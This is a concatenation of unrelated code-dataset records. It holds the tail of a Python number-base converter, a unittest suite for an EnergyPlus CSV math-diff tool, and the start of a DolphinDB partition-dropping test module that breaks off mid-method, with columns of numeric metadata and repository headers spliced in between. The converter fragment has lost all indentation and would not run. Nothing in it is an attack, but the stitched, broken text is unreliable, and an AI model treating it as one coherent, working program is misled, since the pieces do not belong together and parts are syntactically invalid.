elif o_base == 33:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%33
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
else:
string += str(temp%33)
temp = temp // 33
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 34:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%34
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
elif temp2 == 33:
string += "X"
else:
string += str(temp%34)
temp = temp // 34
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 35:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%35
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
elif temp2 == 33:
string += "X"
elif temp2 == 34:
string += "Y"
else:
string += str(temp%35)
temp = temp // 35
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 36:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%36
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
elif temp2 == 33:
string += "X"
elif temp2 == 34:
string += "Y"
elif temp2 == 35:
string += "Z"
else:
string += str(temp%36)
temp = temp // 36
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
else:
break
inp = input("Press Enter to close...")
| 38.141848
| 114
| 0.290496
| 4,927
| 64,803
| 3.758271
| 0.027806
| 0.162823
| 0.060485
| 0.031755
| 0.920343
| 0.915699
| 0.913755
| 0.908408
| 0.904736
| 0.900092
| 0
| 0.057601
| 0.582874
| 64,803
| 1,699
| 115
| 38.141848
| 0.627428
| 0.005293
| 0
| 0.908764
| 0
| 0
| 0.080705
| 0.040241
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.084634
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98cd7cea93240b1af9f1c1e68ba3adc2576339de
| 16,343
|
py
|
Python
|
epregressions/tests/diffs/test_math_diff.py
|
lefticus/EnergyPlusRegressionTool
|
6382334fc350c0dcd0d6d9ccb4fc78f6d622ad1a
|
[
"BSD-3-Clause"
] | 7
|
2019-02-11T19:03:11.000Z
|
2022-01-23T20:03:21.000Z
|
epregressions/tests/diffs/test_math_diff.py
|
lefticus/EnergyPlusRegressionTool
|
6382334fc350c0dcd0d6d9ccb4fc78f6d622ad1a
|
[
"BSD-3-Clause"
] | 69
|
2018-11-12T16:12:35.000Z
|
2021-11-17T17:46:28.000Z
|
epregressions/tests/diffs/test_math_diff.py
|
lefticus/EnergyPlusRegressionTool
|
6382334fc350c0dcd0d6d9ccb4fc78f6d622ad1a
|
[
"BSD-3-Clause"
] | 9
|
2019-01-14T11:09:43.000Z
|
2020-08-03T21:17:24.000Z
|
import os
import tempfile
import unittest
from epregressions.diffs.math_diff import math_diff, DuplicateHeaderException
from epregressions.diffs.thresh_dict import ThreshDict
class TestMathDiff(unittest.TestCase):
def setUp(self):
self.cur_dir_path = os.path.dirname(os.path.realpath(__file__))
self.diff_files_dir = os.path.join(self.cur_dir_path, 'csv_resources')
self.temp_output_dir = tempfile.mkdtemp()
self.thresh_dict = ThreshDict(os.path.join(self.diff_files_dir, 'test_math_diff.config'))
def test_identical_files(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_small_diff_in_watts_files(self):
"""This tests the ability to capture diffs in a regular (not-temperature) variable"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_small_watt_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Small Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(2, response[3]) # small diffs
def test_big_diff_in_watts_files(self):
"""This tests the ability to capture diffs in a regular (not-temperature) variable"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_big_watt_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(2, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_small_diff_in_temp_files(self):
"""This tests the ability to capture diffs in a temperature variable - where relative threshold isn't used"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_small_temp_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Small Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(1, response[3]) # small diffs
def test_big_diff_in_temp_files(self):
"""This tests the ability to capture diffs in a temperature variable - where relative threshold isn't used"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_big_temp_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(1, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_mixed_diffs(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_mixed_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(2, response[2]) # big diffs
self.assertEqual(5, response[3]) # small diffs
def test_changed_column_order_equal(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_change_column_order.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_changed_column_order_diffs(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_change_column_order_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(2, response[2]) # big diffs
self.assertEqual(1, response[3]) # small diffs
def test_changed_timestamps(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_changed_timestamps.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Time series do not match', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_empty_data_file_1(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout_empty_data.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('has no data', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_empty_data_file_2(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_empty_data.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('has no data', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_totally_empty_file_1(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout_totally_empty.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('empty', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_totally_empty_file_2(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_totally_empty.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('empty', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_invalid_file_1(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout_DOESNOTEXIST.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('unable to open file', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_invalid_file_2(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_DOESNOTEXIST.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('unable to open file', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_duplicate_header_fails(self):
with self.assertRaises(DuplicateHeaderException):
math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_duplicate_header.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
def test_data_with_holes(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_with_data_holes.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(1, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_data_with_more_data_than_headers(self):
"""I don't know how we could get to this situation, but anyway, this tests to ensure that if a file has
more data columns than header columns, the data after the last header column is ignored. A diff is encountered
in the extra column, but it should be ignored."""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_more_data_than_headers.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_data_with_totally_different_headers(self):
"""Two files that don't have _any_ common headers shouldn't work"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_totally_different_headers.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('No common fields', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_data_with_extra_column_in_case_2(self):
"""If file 2 has extra columns, the comparison should still work but extra outputs will be ignored"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_extra_column.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
| 50.754658
| 119
| 0.635379
| 2,241
| 16,343
| 4.414993
| 0.062918
| 0.075197
| 0.123307
| 0.17263
| 0.899131
| 0.899131
| 0.899131
| 0.895795
| 0.895795
| 0.886295
| 0
| 0.012229
| 0.239491
| 16,343
| 321
| 120
| 50.912773
| 0.783812
| 0.112036
| 0
| 0.753472
| 0
| 0
| 0.138964
| 0.038999
| 0
| 0
| 0
| 0
| 0.267361
| 1
| 0.072917
| false
| 0
| 0.017361
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98d5c62c287764fcc7a17062b4be18ac4519b46c
| 80,130
|
py
|
Python
|
test/test_dropPartition.py
|
dolphindb/api_python3
|
caf1c6a38fe3dc0febf33ca5f299c2cdae0f139d
|
[
"Apache-2.0"
] | 26
|
2020-08-09T06:02:41.000Z
|
2022-03-22T10:21:27.000Z
|
test/test_dropPartition.py
|
dolphindb/api_python3
|
caf1c6a38fe3dc0febf33ca5f299c2cdae0f139d
|
[
"Apache-2.0"
] | 8
|
2020-09-15T03:26:34.000Z
|
2022-03-23T10:44:33.000Z
|
test/test_dropPartition.py
|
dolphindb/api_python3
|
caf1c6a38fe3dc0febf33ca5f299c2cdae0f139d
|
[
"Apache-2.0"
] | 5
|
2020-09-22T16:15:50.000Z
|
2021-07-28T05:48:27.000Z
|
import unittest
import dolphindb as ddb
from pandas.testing import assert_frame_equal
from setup import HOST, PORT
class DBInfo:
dfsDBName = 'dfs://testDropPartition'
table1 = 'tb1'
table2 = 'tb2'
tableRows = 10000
def create_dfs_range_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,RANGE,0..10*(n/10)+1)
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, 1..n as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_hash_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,HASH,[INT,10])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_value_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,VALUE,2010.01.01..2010.01.30)
tdata=table(sort(take(2010.01.01..2010.01.30, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_range_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',RANGE,1 3 5 7 9 11)
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_hash_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',HASH,[INT,10])
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_value_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',VALUE,1..10)
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_hash_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',HASH,[INT,10])
db3=database('',LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
db=database(dbPath,COMPO,[db1,db2,db3])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_value_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',VALUE,1..10)
db3=database('',LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
db=database(dbPath,COMPO,[db1,db2,db3])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def loadTB(dbPath, tbName, where=""):
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
if where == "":
return s.run("select * from loadTable('{db}', '{tb}') ".format(db=dbPath, tb=tbName))
else:
return s.run("select * from loadTable('{db}', '{tb}') ".format(db=dbPath, tb=tbName) + where)
class DropPartitionTest(unittest.TestCase):
@classmethod
def setUp(cls):
cls.s = ddb.session()
cls.s.connect(HOST, PORT, "admin", "123456")
dbPath = DBInfo.dfsDBName
script = """
if(existsDatabase('{dbPath}'))
dropDatabase('{dbPath}')
""".format(dbPath=dbPath)
cls.s.run(script)
@classmethod
def tearDown(cls):
